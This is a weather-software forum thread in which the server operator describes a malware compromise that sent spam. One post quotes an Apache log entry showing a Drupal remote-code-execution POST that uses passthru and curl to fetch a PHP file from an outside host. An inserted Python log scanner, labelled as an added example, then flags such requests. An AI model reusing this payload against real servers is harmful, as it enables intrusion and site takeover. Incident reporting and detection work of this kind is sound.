IMPORTANT! The server may go down soon - possibly permanently. Please read the latest post in Announcements and News

I strongly advise all users using my server for their web site to make alternative arrangements.

Outgoing mail is disabled because of the malware on the server. No new forum registrations are currently possible, and mail to the forum administrator will not work.

Please read the posts in the Announcements section about the current status of Cumulus development now that I have retired


Site going down.

Toxic17
Posts: 698
Joined: Mon May 19, 2014 10:45 pm
Weather Station: Davis VPro2 Plus
Operating System: Debian 9.5 Stretch
Location: Bangor, NI

Re: Site going down.

Postby Toxic17 » Tue Oct 09, 2018 8:19 pm

Let's hope you've fixed it so you and the wife can get on with the holiday.
Regards Simon

https://www.conligwx.org
https://www.conligwx.org/pws/
https://twitter.com/conligwx
Davis Vantage Pro2+ - CumulusMX v3.0.0 (build 3043) + Saratoga/PWS

Matt.j5b
Posts: 430
Joined: Mon Nov 28, 2011 2:13 am
Weather Station: Davis VP2 and La Crosse WS 2306
Operating System: Windows 10 64 Bit
Location: Ferny Grove, Brisbane, Australia

Re: Site going down.

Postby Matt.j5b » Tue Oct 09, 2018 8:36 pm

It's good to hear you have been making progress and thanks for trying to resolve this. It's a horrible shame how low some people are in what they do to cause trouble. Hopefully you have fixed the issue and you do enjoy your holiday. :)
Regards, Matt of Brisbane, Australia
Ferny Grove Weather
Cumulus MX testing

jlmr731
Posts: 118
Joined: Sat Aug 27, 2016 12:11 am
Weather Station: Davis vantage pro 2
Operating System: Debian
Location: Youngstown, Ohio

Re: Site going down.

Postby jlmr731 » Wed Oct 10, 2018 2:19 am

Any chance that you can give us a little insight on the script they used to keep it running, or what one should look for?
May be helpful for others to know what to do if they have this problem, to stop these script kiddies.

Thanks Steve for your hard work getting this problem resolved while on holiday.

steve
Cumulus Author
Posts: 26697
Joined: Mon Jun 02, 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France

Re: Site going down.

Postby steve » Wed Oct 10, 2018 2:58 pm

I don't really have much to offer, I just deleted installations of things like WordPress and Drupal which hadn't been kept up to date. This entry (and others similar) in the apache log looked suspicious (thanks go to Ken for suggesting that a suspicious POST was something to look for), and from googling it appeared to be related to a Drupal vulnerability:

85.126.200.23 - - [08/Oct/2018:04:43:19 +0200] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/.htaccess+htaccessx;curl+-o+sites/default/api.php+'http://saint-laurent-gorre.fr/_inc/_phpThumb/demit.aff' HTTP/1.1" 200 8120 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36"

I realised that I had been wrong about the spam not coming from the server when I had turned off all the legitimate sources of email and there were still smtp connections being made. I also had a number of (supposedly) exim processes running, and I don't have exim installed. Some malware disguises itself as exim, amongst other things.

It makes you realise that Linux is no more secure than Windows unless you really know what you're doing, keep on top of vulnerability notices and keep everything up to date. Although I believe this incident was my fault for not keeping things up to date, I do now regret allowing some users to install things like phpBB and WordPress.
Steve
-----
Hosting available for Cumulus web sites. See http://sandaysoft.com/forum/viewtopic.php?f=2&t=11876

Please read the posts in the Announcements section about the current status of Cumulus development since I have retired from my day job
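
As an added example (not from Steve's post or from the Cumulus project), here is a small detection pass over Apache combined-format access log lines that flags the pattern in the entry quoted above: a POST whose query string carries Drupal Form API render hooks and a PHP command-execution function, answered with 200. The sample lines are constructed, using documentation-range addresses and an invalid download host.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" log layout, the same shape as the entry quoted in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

# Drupal Form API render hooks and PHP command functions have no business in a
# query string; together they are the fingerprint of the request seen above.
RENDER_HOOK = re.compile(r'#(post_render|pre_render|lazy_builder)\b', re.I)
SHELL_FUNCS = re.compile(r'\b(passthru|exec|shell_exec|system|popen)\b', re.I)
FETCH_TOOLS = re.compile(r'\b(curl|wget)\s', re.I)

def classify(line):
    """Parse one log line; return (ip, status, [reasons]) or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote_plus(m['target'])   # %23 -> '#', '+' -> ' '
    reasons = []
    if m['method'] == 'POST' and RENDER_HOOK.search(target):
        reasons.append('form-api render hook in query string')
    if SHELL_FUNCS.search(target):
        reasons.append('php command-execution function in request')
    if FETCH_TOOLS.search(target):
        reasons.append('remote download tool named in request')
    if reasons and m['status'].startswith('2'):
        reasons.append('server answered 2xx (payload likely executed)')
    return m['ip'], int(m['status']), reasons

def scan(lines):
    """Return only the suspicious hits as a list of (ip, status, reasons)."""
    return [r for r in map(classify, lines) if r and r[2]]

# Constructed sample lines (not real traffic): documentation-range IPs and an
# invalid download host; the second line mimics the entry quoted in the post.
SAMPLE = [
    '192.0.2.10 - - [08/Oct/2018:04:40:02 +0200] "GET /?q=user/password HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [08/Oct/2018:04:43:19 +0200] "POST //?q=user/password&name[%23post_render][]=passthru'
    '&name[%23type]=markup&name[%23markup]=curl+-o+sites/default/api.php+'
    "'http://dropper.example.invalid/x.txt' HTTP/1.1\" 200 8120 \"-\" \"Mozilla/5.0\"",
    '192.0.2.10 - - [08/Oct/2018:04:45:00 +0200] "POST /?q=user/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for ip, status, reasons in scan(SAMPLE):
        print(ip, status, '; '.join(reasons))
```

Run it against a real access log with `scan(open('access.log'))`; a benign GET or login POST produces no reasons, so only the abusive request is reported.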

RayProudfoot
Posts: 2585
Joined: Wed May 06, 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England

Re: Site going down.

Postby RayProudfoot » Wed Oct 10, 2018 4:05 pm

Steve, thanks for the update. Way over my head I’m afraid. Does this now mean the malware is no more and the hosting company have removed the threat of closure?
Cheers,
Ray, Cheshire.


steve
Cumulus Author
Posts: 26697
Joined: Mon Jun 02, 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France

Re: Site going down.

Postby steve » Wed Oct 10, 2018 4:54 pm

I believe the malware is no more, although there is still a slight oddity to be explained, but this apparently is not doing any harm. Hetzner are going to review after two days. After which I will re-enable the outgoing smtp port so that mail from the forum will start working again, and hopefully the server will eventually stop being flagged as a risk - I’ve noticed in the mail logs that some destinations are refusing mail from us.
Steve

RayProudfoot
Posts: 2585
Joined: Wed May 06, 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England

Re: Site going down.

Postby RayProudfoot » Wed Oct 10, 2018 9:54 pm

Thanks Steve. I’m breathing a huge sigh of relief. Things looked very bleak over the weekend but you’ve done a great job in sorting things out aided by Ken. :clap:
Cheers,
Ray, Cheshire.


hornychz
Posts: 7
Joined: Mon May 11, 2015 3:54 pm
Weather Station: WeatherDuino Pro2
Operating System: Raspbian Wheezy
Location: Brandys nad Labem - Stara Boleslav, Czech republic

Re: Site going down.

Postby hornychz » Thu Oct 11, 2018 8:11 am

:clap: :)

Toxic17
Posts: 698
Joined: Mon May 19, 2014 10:45 pm
Weather Station: Davis VPro2 Plus
Operating System: Debian 9.5 Stretch
Location: Bangor, NI

Re: Site going down.

Postby Toxic17 » Thu Oct 11, 2018 11:34 am

It sounds more like a PHP injection vulnerability than Linux itself being hacked. PHP CMSs are plagued with security holes, and only by updating them when updates are released can you try to secure a site.

Steve, on that note you would be advised to update phpBB. You're running a version that needs updating ;)

pm sent...
Regards Simon


RayProudfoot
Posts: 2585
Joined: Wed May 06, 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England

Re: Site going down.

Postby RayProudfoot » Thu Oct 11, 2018 12:00 pm

Not sure if this is related or not, but when I log into my account with FileZilla it notifies me the certificate has expired. Is that a potential area of concern?
Cheers,
Ray, Cheshire.


steve
Cumulus Author
Posts: 26697
Joined: Mon Jun 02, 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France

Re: Site going down.

Postby steve » Thu Oct 11, 2018 1:05 pm

I created a dummy certificate when I enabled secure FTP on the server when testing the code I added to Cumulus MX. FileZilla will try to use secure FTP in preference and will get the dummy certificate. I suppose I should really disable secure FTP on the server, I get asked about this regularly. The last time I was asked, I forgot how it was supposed to work, and broke the server for a short time trying to fix something that didn't need fixing!

At some point I may look into getting a proper certificate, now that they can be had for free.

(Short answer: no :) )
Steve

RayProudfoot
Posts: 2585
Joined: Wed May 06, 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England

Re: Site going down.

Postby RayProudfoot » Thu Oct 11, 2018 3:45 pm

Thanks Steve. Not a major issue for me but given recent events thought it worth asking. I imagine you're feeling a lot better now! Time for a beer or two! :D
Cheers,
Ray, Cheshire.


steve
Cumulus Author
Posts: 26697
Joined: Mon Jun 02, 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France

Re: Site going down.

Postby steve » Mon Oct 15, 2018 2:41 pm

The spam has started again. I have blocked outgoing traffic on port 25 and will investigate when I get home, I've had enough of this for now.

I strongly advise anyone whose web site is on this server to start making alternative arrangements. I will refund any payments made, pro-rata, on request to steve@nybbles.co.uk
Steve

saratogaWX
Posts: 896
Joined: Wed May 06, 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows XP SP3
Location: Saratoga, CA, USA

Re: Site going down.

Postby saratogaWX » Mon Oct 15, 2018 4:21 pm

Ouch. I’ll be glad to analyze the logs again, Steve.

Best regards,
Ken

steve
Cumulus Author
Posts: 26697
Joined: Mon Jun 02, 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France

Re: Site going down.

Postby steve » Mon Oct 15, 2018 4:29 pm

Thanks, Ken, when I get chance I’ll zip them up for you.
Steve
